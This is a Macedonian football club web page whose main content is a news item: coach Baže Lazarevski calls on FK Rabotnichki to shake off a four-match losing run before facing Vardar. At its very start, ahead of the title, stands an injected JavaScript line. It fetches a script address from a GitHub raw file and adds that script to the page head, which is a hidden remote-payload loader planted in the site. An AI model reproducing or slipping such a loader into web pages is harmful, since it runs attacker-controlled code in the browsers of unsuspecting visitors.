;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Баже Лазаревски: Мора да излеземе од летаргијата
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Баже Лазаревски: Мора да излеземе од летаргијата

Работнички има низа од четири последовни порази, последниот дојде во 32.коло од Шкендија (0-1), и тоа со гол примен во 90.минута од натпреварот. Тимот се наоѓа на шестата позиција на табелата со 39 бода, но само со два бода позитива во однос на Силекс кој е на осмото место.

Тренерот Баже Лазаревски повикува на мобилизација, стои цврсто зад своите фудбалери и верува дека Работнички ќе излезе од летаргијата.

„Поразите никогаш не се добредојдени, а најмалку во финишот на првенството. Мора да излеземе од летаргијата и да се потрудиме да го вратиме победничкиот лик. Знам дека фудбалерите чувствуваат и замор, крај е на шампионатот, но мораме да го дадеме максимумот за Работнички да го заокружи првенството како што доликува. Не очекува дуел со Вардар и ќе се обидеме да одиграме квалитетно и да освоиме бодови“, вели шефот на стручниот штаб, Баже Лазаревски.

Работнички в среда ќе му гостува на Вардар во 33.коло од Првата фудбалска лига.